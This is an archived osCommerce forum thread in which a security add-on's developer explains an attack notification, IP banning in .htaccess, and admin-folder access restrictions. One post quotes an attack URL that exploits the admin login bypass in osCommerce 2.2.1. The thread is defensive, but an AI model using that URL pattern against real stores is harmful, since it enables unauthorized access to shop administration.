Taipo Posted April 22, 2011 Share Posted April 22, 2011 I just received this, does it mean everything is ok? Yup, thats just an email notification to let you know that an attempt was made, the IP was banned in the htaccess file. If you have a look in that htaccess file you should see where osc_sec has added the code, down the bottom. The attack was aimed at ... http://www.yoursite.co.uk/cart/index.php?cPath=21/admin/file_manager.php/login.php ... Which is aimed at exploiting the admin bypass security hole in OSC_2.2.1 which is in the $PHP_SELF code that is patched in osc_sec. If you get inundated with these attacks and get sick of receiving so many emails, you could either take out a gmail address or something just for your site, or just switch the email notifications off. Most site owners get about 6 or so of these a day, some get 100 an hour. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Taipo Posted April 22, 2011 Share Posted April 22, 2011 In actual fact, it is also ok to go into your htaccess and delete out the list of banned IP addresses once a week as well if you wish. The chances of your site receiving another attack from the same IP address after the attackers end has received a 403 ban is minimal, however the point of adding the IP address to the htaccess file as osc_sec does is to reduce the load on your webserver. From what I have seen, these requests are repeated via the same IP address for about an hour, so if your scripting is merely blocking the requests rather than banning the IP address, then the server will still be under load, well a little more than if the IP address was just banned outrightly. This is even worse for those that are using a patched version of Oscommerce like 2.3.1. The requests being automated, will still be coming in and trying to load that type of URL, in which the patched version of Oscommerce would (in the instance above) redirect the request to the index.php, but being in the admin directory, would then redirect again to the login.php script. Which is ok if you are receiving 6 or so of these requests a day, however for busier sites they could be receiving a 20 or so of these per minute often from the same IP address, which without using htaccess blocking, would lag their webserver something fierce. So osc_sec takes the effort out of htaccess banning and does it all for you. But again, the list of IPs can be deleted on a regular basis, weekly or whenever. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
qwertyjjj Posted April 23, 2011 Author Share Posted April 23, 2011 Unless the attacker was able to find your admin directory, or able to bypass the htaccess blocking in the way I described, the other option is that there is a piece of appended code in one of your site files that must have been resident there before you installed SiteMon? (assuming that SiteMon is doing its job correctly) <LimitExcept GET POST> Deny from all </LimitExcept> <Limit GET POST> order allow,deny deny from all allow from [your_external_ip_address] </Limit> Just put your external IP address in the allow from. BTW what code were you using prior to this to allow only your IP address? Can't remember exactly but I think I was just using: order allow,deny deny from all allow from [your_external_ip_address] It was working correctly though. At the moment the below code works but not the suggestion above: <Limit GET POST PUT> order deny,allow deny from all #allow from xx.xx.xx.xx/11 #allow from xx.xx.xx.xx/12 allow from xx.xx.xx.xx/12 </Limit> I tried the below but it won;t let me access. Is there any issue with the 2 directives in the same htaccess. Should I only be using this for the admin folder? <LimitExcept GET POST> Deny from all </LimitExcept> <Limit GET POST> order allow,deny deny from all allow from [i]I put my IP address block here[/i] </Limit> Is this a normal oscommerce file? File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/cookie_usage.php (Known filename threat) Link to comment Share on other sites More sharing options...
Taipo Posted April 23, 2011 Share Posted April 23, 2011 That could well be the issue. However if you are using it without the directives then best leave it at that...since that works. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.